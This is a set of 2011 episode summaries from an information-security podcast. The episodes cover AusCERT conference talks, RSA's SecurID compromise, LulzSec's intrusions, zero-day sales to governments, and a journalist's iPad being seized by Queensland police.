RSA confirms SecurID tokens make nice earrings...
June 10th, 2011 --
In this week's feature interview we're chatting with Neal Wise of Assurance.com.au about RSA's decision to finally admit what we all knew already -- that its SecurID product line has been compromised. RSA is offering to replace tokens... we'll chat with Neal about whether it will make sense to do that or not. In this week's sponsor interview we're joined by Astaro's director of Support Alan Toews. We're talking about the silver lining to all the chaos out there at the moment -- does the awareness raised by the actions of groups like LulzSec offset the harm they cause to their victims?
Elephant in room visible. Cans open. Worms everywhere...
June 8th, 2011 --
Although large sections of the security community will deny it if you ask them, they're secretly enjoying watching LulzSec's campaign of mayhem unfold. So far the "hacker group" has penetrated systems owned by Sony, PBS, the "FBI affiliate site" Infragard, security company (hah!) Unveillance and Nintendo, among others.
Why oh why is infosec software full of bugs?
June 2nd, 2011 --
On this week's show we're taking a look at the issue of failkit. Why is it that the very software designed to keep our networks secure is full of bugs? A pen tester buddy of mine recently found an 0day XSS in a single sign on product... on ITS FRONT PAGE. Another friend found an auth bypass in a two-factor authentication management console. ON ITS FRONT PAGE. It's impossible to find AV engines that don't come preloaded with a zillion format string vulnerabilities, and as you'll hear in this week's news, even Cisco's VPN solution is a nice way to actually own organisations. WTF.
Most weaponised exploits now sold to governments, HD Moore says...
May 26th, 2011 --
On this week's show we're chatting with HD Moore all about a recent decision by research house VUPEN to refuse to share their research into Chrome vulnerabilities with Google. The French group likely sells 0days to governments, militaries and intelligence agencies to use on offensive operations -- so of course sharing its exploit information wouldn't make much sense for them. But what does this mean? Will we see any bugs in the open anymore? Or will they all go underground and be sold to governments?
Day three keynote from the AusCERT conference... good stuff...
May 24th, 2011 --
This is a full presentation by AusCERT's day three keynote speaker Ross Anderson. Ross has kindly allowed us to podcast his entire talk. Ross is professor of security engineering at Cambridge University, and author of the bestselling textbook "Security Engineering: A Guide to Building Dependable Distributed Systems". He was a pioneer of peer-to-peer systems, of hardware tamper-resistance, and of the economics of information security.
Many impact scores exist. How does Microsoft figure out its ratings?
May 24th, 2011 --
Microsoft was kind enough to sponsor our coverage of AusCERT's 2011 conference and as a part of that sponsorship arrangement we're doing these sponsored podcasts. We've already posted two interviews with Microsoft peeps about security issues, but we're posting this full talk as well. Maarten Van Horenbeeck works in the Microsoft Security Response Center managing Microsoft's efforts to share information on security vulnerabilities with third party security software providers, government agencies and national CERT teams.
Shameless self promotion begins below...
May 23rd, 2011 --
Tony Oliver and the Pubcast crew interviewed me about the talk I did at ITWeb's Security Summit in South Africa the other week. My talk was all about militarisation trends in the digital security field. I drew parallels between the Cold War and what's happening now. You can find it here. Thanks to Tony and the rest of his gang for having me on their show. It's good to be on the other end of an interview every now and then!
It turns out routing tables lie more than politicians...
May 20th, 2011 --
This podcast is a complete presentation by APNIC's Geoff Huston. According to the official synopsis: This presentation will outline the role of addresses and routing and the potential attack vectors, and will also report on the progress to establish a secure framework for addresses and their use in the Internet, highlighting the progress in establishing a secure routing environment for the Internet. As regular RB listeners would know, we've followed APNIC's work and papers in this area and they have a habit of pushing out good stuff... so this should be a decent talk. Enjoy!
AusCERT's speed debates back in 2011!
May 20th, 2011 --
You're about to hear one of the highlights of AusCERT's annual conference -- the speed debates! Not to be taken too seriously, the speed debate happens at the end of the con -- it's a chance to have a laugh and shed some lighter perspectives on the security discipline. It's hosted by Australian broadcaster and journalist Adam Spencer. I hope you enjoy it.
PSN breach keeps enterprise customers up at night...
May 20th, 2011 --
Microsoft was kind enough to sponsor our coverage of AusCERT's 2011 conference and as a part of that sponsorship arrangement we're doing these sponsored podcasts. They're general chats with Microsoft peeps about security issues. And in this interview we're chatting with Microsoft Australia's Chief Security Advisor Stuart Strathdee about the affect the PSN network breach has had on large organisations' security outlook. As you'll hear, Stuart says a lot of security projects that had been on the back burner are now being brought forward. Enjoy!
Ben Grubb's iPad should not have been seized...
May 19th, 2011 --
The publication of allegedly stolen, private photographs by Fairfax Online was eclipsed in stupidity only by the QLD Police Service's decision to seize the iPad of journalist Ben Grubb at the AusCERT conference on Tuesday. Every time the coppers raid media organisations to seize computers and documents in order to track down, say, the source of an embarrassing political leak, it pisses me off something awful. The lack of respect shown to the media and its sources by governments in this country, both state and federal, is pretty astonishing.
Incredible feat performed live at AusCERT 2011...
May 18th, 2011 --
You're about to hear a full presentation recorded at the AusCERT conference: a great presentation by Mark Newton, an engineer with Internode, all about IPv6 security. Internode is an ISP and Mark really knows his stuff. We all know security considerations in IPv6 aren't exactly thrilling, but Mark managed to actually make this presentation interesting and a little bit thought provoking. I was popping in and out throughout this session and yeah, it was definitely more interesting than I was expecting. So here it is!
Scott's always good for a laugh!
May 18th, 2011 --
You're about to hear a full presentation recorded at the AusCERT conference. Scott McIntyre is a recent immigrant to Australia... he used to work for XS4all in the Netherlands, but these days he works as the Senior Technology Architecture Specialist in Security Operations for Telstra in Melbourne. His presentation is all about his views though, not those of Telstra. Disclaimer. Etc.
What is hip... tell me tell me if you think you know...
May 18th, 2011 --
Our coverage of the conference is brought to you by the fine folks at Microsoft -- without their support, there would be no AusCERT podcasts, so big thanks to MS!
It's all just a bit out of control...
May 18th, 2011 --
Well, hasn't this been an interesting AusCERT... If you haven't heard by now, Fairfax IT journalist Ben Grubb was briefly detained by QLD police yesterday afternoon in connection to a BSides Australia security presentation delivered on Sunday. The presentation, by Christian Heinrich, demonstrated a brute-force attack against Facebook's Content Distribution Network. I didn't see the presentation myself, but the long and short of it is the vulnerability demonstrated allows the attacker to obtain Facebook users' private photos. So how did the police become involved?
Where's the BeEF, chief?
May 16th, 2011 --
In this interview we're chatting with Wade Alcorn. By day he's NGS Security's general manager for Asia Pacific, but by night he's out there maintaining BeEF -- the browser exploitation framework. If you haven't heard of beef it's a very cool tool. If you can get someone to load it into your browser, either by them visiting a site you control directly, or alternatively through some sort of cross site scripting bug, then you can get the browser to do all sorts of stuff for you -- like portscan the victim's LAN, attack JBOss servers and stuff like that.
Is Smart Grid security stupid?
May 16th, 2011 --
This podcast is an AusCERT talk by Ian Appleby. He's the Information Security Manager at Endeavour Energy and he's responsible for the security of its Corporate and SCADA Systems. The talk is on Risk Management in a Smart Metering Environment.
Man of mystery joins Risky Business...
May 16th, 2011 --
In this interview we hear from Tim Hudson, an independent cryptography dude, who, as you'll hear, may or may not have worked on Queensland's Smart Card drivers license project. Absurdly, on legal advice, he can't actually tell us if he worked on that project. There were mutterings in the Queensland state parliament some time ago about a project consultant criticising the rollout... the minister responsible also said something about the department exploring legal options to shut said critic up. Geez, I wonder if it was Tim?
He didn't write Stuxnet. Honest.
May 16th, 2011 --
You're about to hear a presentation by Jason Larsen, a security researcher at the Idaho National Laboratory. The INL is run by the US Department of Energy and is home to the National SCADA Testbed (NSTB) and the Industrial Control System CERT(ICS-CERT).
Comedian and ID theft victim Bennett Arron entertains at AusCERT...
May 16th, 2011 --
You're about to hear an excerpt from the opening keynote from the AusCERT conference by comedian Bennett Arron. Several years ago Bennett Arron was in serious debt. He owed thousands of pounds to mobile phone companies, catalogues and department stores. But it wasn’t him! As it turned out, he was a victim of Identity Theft. Years later, he wound up writing a comedy show about his experience... he eventually directed and presented a Documentary for Channel 4 called How To Steal An Identity. In it he actually stole the identity of the then Home Secretary, Charles Clarke.